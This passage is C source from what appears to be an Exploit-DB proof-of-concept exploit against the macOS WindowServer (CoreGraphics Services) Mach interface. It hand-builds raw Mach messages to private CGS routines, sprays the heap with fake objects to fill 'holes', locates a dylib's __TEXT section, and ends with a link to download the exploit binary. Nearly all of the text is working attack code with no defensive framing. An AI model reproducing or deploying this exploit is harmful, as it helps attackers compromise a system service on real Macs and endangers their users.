3; } ENFORCE(nb_arrays == NB_REUSE, fail); ProcessSerialNumber psn; psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x12340000; ENFORCE(_CGSCreateApplication(connection_id, psn, 1, 0, 2, getpid(), "a", false, connection_id) == -50, fail); free_application = false; for (uint32_t i = 0; i < 1000; i++) { char key[0x80]; ProcessSerialNumber psn; psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x56780000; // help changing core... ENFORCE(_CGSCreateApplication(connection_id, psn, 0, 0, 2, getpid(), "a", true, connection_id) == KERN_SUCCESS, fail); free_tmp_application = true; // we use a long name to make sure it'll not be placed in our holes :) snprintf(key, sizeof(key), "FAKE_OBJECT_WITH_A_VERY_LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOONG_NAME_%d", i); ENFORCE(_CGSSetConnectionProperty(CGSGetConnectionPortById(connection_id), connection_id, key, data_bytes, data_size, false) == KERN_SUCCESS, fail); ENFORCE(_CGSCreateApplication(connection_id, psn, 1, 0, 2, getpid(), "a", false, connection_id) == -50, fail); free_tmp_application = false; usleep(10); } CFRelease(data); data = NULL; return 0; fail: if (free_application) { ProcessSerialNumber psn; psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x12340000; _CGSCreateApplication(connection_id, psn, 2, 0, 2, getpid(), "a", false, connection_id); } if (free_tmp_application) { ProcessSerialNumber psn; psn.highLongOfPSN = 0; psn.lowLongOfPSN = 0x56780000; _CGSCreateApplication(connection_id, psn, 2, 0, 2, getpid(), "a", false, connection_id); } for (uint32_t i = 0; i < COUNT_OF(set_array_values); i++) if (set_array_values[i] != NULL) CFRelease(set_array_values[i]); if (data != NULL) CFRelease(data); if (big_array != NULL) CFRelease(big_array); return -1; } static int find_dylib_text_section(const char *dylib_name, void **text_address, size_t *text_size) { uint32_t image_count = _dyld_image_count(); for (uint32_t i = 0; i < image_count; i++) { const char *current_dylib_name = _dyld_get_image_name(i); ENFORCE(current_dylib_name != NULL, fail); if (strcmp(current_dylib_name, dylib_name) != 0) continue; const struct mach_header_64 *dylib_header = (const struct mach_header_64 *)_dyld_get_image_header(i); ENFORCE(dylib_header != NULL, fail); ENFORCE(dylib_header->magic == MH_MAGIC_64, fail); uint32_t max_size = dylib_header->sizeofcmds; ENFORCE(max_size < 0x2000, fail); struct load_command *load_command = (struct load_command *)(dylib_header+1); struct load_command *next_command; ENFORCE(dylib_header->ncmds < 0x100, fail); for (uint32_t cmd_i = 0; cmd_i < dylib_header->ncmds; cmd_i++, load_command = next_command) { ENFORCE(load_command->cmdsize <= max_size, fail); ENFORCE(load_command->cmdsize >= sizeof(struct load_command), fail); next_command = (struct load_command *)((uintptr_t)load_command + load_command->cmdsize); max_size -= load_command->cmdsize; if (load_command->cmd != LC_SEGMENT_64) continue; ENFORCE(load_command->cmdsize >= sizeof(struct segment_command_64), fail); struct segment_command_64 *segment_command_64 = (struct segment_command_64 *)load_command; if (strcmp(segment_command_64->segname, "__TEXT") != 0) continue; struct section_64 *sections = (struct section_64 *)(segment_command_64 + 1); ENFORCE(segment_command_64->nsects < 0x100, fail); ENFORCE(load_command->cmdsize == sizeof(struct segment_command_64) + segment_command_64->nsects*sizeof(struct section_64), fail); for (uint32_t sect_i = 0; sect_i < segment_command_64->nsects; sect_i++) { if (strcmp(sections[sect_i].sectname, "__text") != 0) continue; *text_address = (void *)(sections[sect_i].addr + _dyld_get_image_vmaddr_slide(i)); *text_size = sections[sect_i].size; return 0; } } } fail: return -1; } #pragma pack(push, 4) typedef struct { mach_msg_header_t header; mach_msg_body_t body; mach_msg_ool_descriptor_t ool_serialized_value; NDR_record_t NDR_record; uint64_t connection_id; uint32_t key_len; char key[128]; uint32_t serialized_value_length; } CGSSetConnectionProperty_message_t; #pragma pack(pop) static mach_msg_return_t _CGSSetConnectionProperty(mach_port_t connection_port, int connection_id, const char *key_value, const void *serialized_value, uint32_t serialized_value_length, bool deallocate) { CGSSetConnectionProperty_message_t msg; memset(&msg, 0, sizeof(msg)); msg.body.msgh_descriptor_count = 1; msg.ool_serialized_value.type = MACH_MSG_OOL_DESCRIPTOR; msg.ool_serialized_value.address = (void *)serialized_value; msg.ool_serialized_value.size = serialized_value_length; msg.ool_serialized_value.deallocate = deallocate; msg.ool_serialized_value.copy = MACH_MSG_VIRTUAL_COPY; msg.NDR_record = NDR_record; msg.connection_id = connection_id; strncpy(msg.key, key_value, sizeof(msg.key)); msg.key_len = 127; msg.serialized_value_length = serialized_value_length; msg.header.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, 0) | MACH_MSGH_BITS_COMPLEX; msg.header.msgh_remote_port = connection_port; msg.header.msgh_id = 29398; kern_return_t kr = mach_msg(&msg.header, MACH_SEND_MSG, sizeof(msg), 0, 0, 0, 0); return kr; } #pragma pack(push, 4) typedef struct { mach_msg_header_t header; mach_msg_body_t body; mach_msg_ool_descriptor_t ool_serialized_value; NDR_record_t NDR_record; uint32_t serialized_value_length; } CGSSetPerUserConfigurationData_message_t; #pragma pack(pop) #pragma pack(push, 4) typedef struct { mach_msg_header_t header; NDR_record_t NDR_record; uint64_t process_serial_number; uint32_t connection_id; } CGSSetAuxConn_message_t; #pragma pack(pop) static mach_msg_return_t _CGSSetAuxConn(uint32_t connection_id, ProcessSerialNumber *process_serial_number) { CGSSetAuxConn_message_t msg; memset(&msg, 0, sizeof(msg)); msg.connection_id = connection_id; msg.process_serial_number = *(uint64_t *)process_serial_number; msg.NDR_record = NDR_record; msg.header.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, 0); msg.header.msgh_remote_port = CGSGetConnectionPortById(connection_id); msg.header.msgh_id = 29368; return mach_msg(&msg.header, MACH_SEND_MSG, sizeof(msg), 0, 0, 0, 0); } #pragma pack(push, 4) typedef struct { mach_msg_header_t header; NDR_record_t NDR_record; ProcessSerialNumber sn; uint32_t session_id; uint32_t session_attributes; uint32_t unknown_2; uint32_t pid; uint32_t padding_1; uint32_t app_name_len; char app_name[128]; char multi_process; uint32_t connection_id; uint32_t padding_2; } CGSCreateApplication_message_t; typedef struct { mach_msg_header_t header; NDR_record_t NDR_record; kern_return_t retcode; } CGSCreateApplication_reply_t; #pragma pack(pop) static mach_msg_return_t _CGSCreateApplication(uint32_t connection_id, ProcessSerialNumber sn, uint32_t session_id, uint32_t session_attributes, uint32_t unknown_2, pid_t pid, char *app_name, char multi_process, uint32_t sent_connection_id) { CGSCreateApplication_message_t msg; memset(&msg, 0, sizeof(msg)); msg.connection_id = connection_id; msg.sn = sn; msg.session_id = session_id; msg.session_attributes = session_attributes; msg.unknown_2 = unknown_2; msg.pid = pid; strncpy(msg.app_name, app_name, sizeof(msg.app_name)); msg.app_name_len = 127; msg.multi_process = multi_process; msg.connection_id = sent_connection_id; msg.NDR_record = NDR_record; msg.header.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE); msg.header.msgh_remote_port = CGSGetConnectionPortById(connection_id); msg.header.msgh_id = 29507; msg.header.msgh_local_port = mig_get_reply_port(); mach_msg_return_t kr = mach_msg(&msg.header, MACH_SEND_MSG|MACH_RCV_MSG, sizeof(msg), sizeof(msg), msg.header.msgh_local_port, 0, 0); if (kr != KERN_SUCCESS) { switch (kr) { case MACH_SEND_INVALID_DATA: case MACH_SEND_INVALID_DEST: case MACH_SEND_INVALID_HEADER: mig_put_reply_port(msg.header.msgh_local_port); break; default: mig_dealloc_reply_port(msg.header.msgh_local_port); } } else kr = ((CGSCreateApplication_reply_t *)&msg)->retcode; return kr; } static void timed_log(char* format, ...) { char buffer[30]; struct tm* time_info; time_t t = time(NULL); time_info = localtime(&t); strftime(buffer, 30, "%Y-%m-%d %H:%M:%S ", time_info); fputs(buffer, stderr); va_list args; va_start(args, format); vfprintf(stderr, format, args); va_end(args); } # Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46428.zip